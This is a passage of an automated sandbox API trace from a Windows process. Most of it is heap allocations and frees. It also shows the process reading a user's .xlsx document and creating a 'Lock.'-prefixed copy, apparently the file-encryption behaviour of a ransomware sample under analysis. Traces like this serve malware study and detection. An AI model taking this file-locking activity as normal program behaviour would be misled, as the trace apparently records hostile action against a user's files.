lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.451] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0265.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0265.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.455] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.455] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.455] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.455] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.455] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/oh6dPV4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oh6dpv4.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0265.456] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0265.456] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0265.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0265.457] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.457] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.457] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.457] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.oh6dPV4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.oh6dpv4.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0265.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0265.458] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0265.458] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.458] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0265.458] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0265.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.459] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0265.459] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x2a8f, lpOverlapped=0x0) returned 1 [0265.460] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0265.460] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0265.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2a8f) returned 0x34a4048 [0265.460] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0265.461] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.461] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0265.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0265.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2a8f) returned 0x34a4048 [0265.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0265.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2a8f) returned 0x3571018 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0265.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.463] 